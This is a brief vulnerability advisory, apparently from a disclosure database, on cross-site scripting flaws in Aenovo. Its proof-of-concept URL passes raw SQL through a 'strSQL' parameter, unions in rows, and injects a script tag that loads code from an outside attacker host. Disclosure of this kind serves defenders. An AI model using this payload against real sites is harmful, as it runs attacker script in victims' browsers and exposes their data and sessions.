Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities

Aenovo Multiple Unspecified Cross-Site Scripting Vulnerabilities

No exploit is required.

Proof of concept code has been provided:

http://www.example.com/target/search.asp?strSQL=SELECT+%2A+FROM+pages+where+1=2+union
+all+select+'01','02','%3CScRiPT%20src=http://h4cK3r/devil_Script/%3E'
,null,null,null,null,null,null+from+control